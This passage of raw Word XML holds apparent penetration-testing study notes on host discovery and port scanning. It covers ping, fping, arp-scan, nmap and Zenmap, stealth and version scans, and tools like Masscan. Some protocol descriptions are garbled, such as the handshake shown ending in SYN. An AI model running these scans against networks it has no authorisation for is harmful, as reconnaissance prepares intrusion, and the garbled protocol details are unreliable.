        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Resolving addresses on the specified host and mapping the IP address to the MAC address (again, can be vice versa)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E9247E" w14:textId="77777777" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73388E2A" w14:textId="092115D3" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>PING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B840F" w14:textId="3B8F686A" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“ping (IP ADDRESS/DOMAIN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C8B3C" w14:textId="44ECD4C7" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Bounce back packets from a host to see if they are responding or if the host is up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8DAC25" w14:textId="31BFC1C3" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If a host is unreachable, it will display an unreachable message.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71239EEF" w14:textId="77777777" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DB317B7" w14:textId="35417454" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>FPING</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669ED425" w14:textId="7AFF0FA6" w:rsidR="00B633A2" w:rsidRPr="002A77BD" w:rsidRDefault="00B633A2" w:rsidP="00B633A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“fping -I(interface) tap0 -g 10.142.111.0/24 -a (alive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C628F45" w14:textId="2D785D2E" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“fping -I tap0 -g (HOST/SUBNET) -a 2&gt;/dev/null”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBA6F19" w14:textId="4EE819B5" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>sudo arp-scan -I tap0 (HOST/SUBNET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2144D2E6" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="685B7999" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In some cases, hosts can be prevented from replying to ping scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1854DDB1" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>In other cases, hosts can be prevented from replying to ARP scans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722BE11F" w14:textId="7FA1303E" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Use both interchangeably to determine if a host is up, they work well in cohesion.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186863BE" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C71EB3" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF1BF73" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="514A7385" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap -sn (HOST/SUBNET)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303E9FDE" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CD1B8E7" w14:textId="2125D418" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Unlike the other singular scans that only use a specific packet to scan a target, NMAP will use a multitude of different scan techniques using different packet types to determine if a host is active.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64AF2499" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E1BE1A4" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ZENMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAC252B" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D1AE599" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>GUI version of nmap, open-source and available on all OSes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE6E589" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Input:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6400B97F" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AD91961" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Target HOST/SUBNET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AF425B" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Profile: ping scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9165A9" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Command: nmap -sn (HOST/SUBNET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7429929B" w14:textId="54090000" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EA2F74" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Topology gives a visual graph on the detected hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D19345" w14:textId="7851EE37" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170B94D6" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>NMAP SCAN NETWORK SCAN PAYLOADS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32599642" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31E62484" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65139AD1" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C272CFA" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Three-way handshake determines if a host is active SYN -&gt; SYN/ACK -&gt; SYN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F53F9F" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C969791" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68418996" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Stealth scans will not send the last SYN packet, and will instead reply with a RST (reset) packet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35483FB2" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC06156" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0262F9A3" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TCP – Service Version: SYN -&gt; SYN/ACK -&gt; ACK -&gt; Banner -&gt; RST + ACK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A0F8A14" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3130ED06" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D01BBCC" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ UDP (-sU) is obviously much slower, they are open/filtered, and can be sped up using -T or -A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E58EE" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1DF65172" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Use the help age for NMAP to find every flag/parameter that is usable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9F319F" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F3F64DF" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Always look at what the -sV command outputs to determine machine/server info and potential version vulnerabilities if applicable (dependent on the version).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0D9D20" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B518D7F" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Other tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE15CE" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B87636A" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Zenmap – GUI NMAP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FDC2B6" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ NMAP Automator – Based off the subnet you get it, it will run new scans and continue to enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5923747E" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Masscan – Fast port scanner, multithreading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4038DE57" w14:textId="77777777" w:rsidR="0042357C" w:rsidRPr="002A77BD" w:rsidRDefault="0042357C" w:rsidP="0042357C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
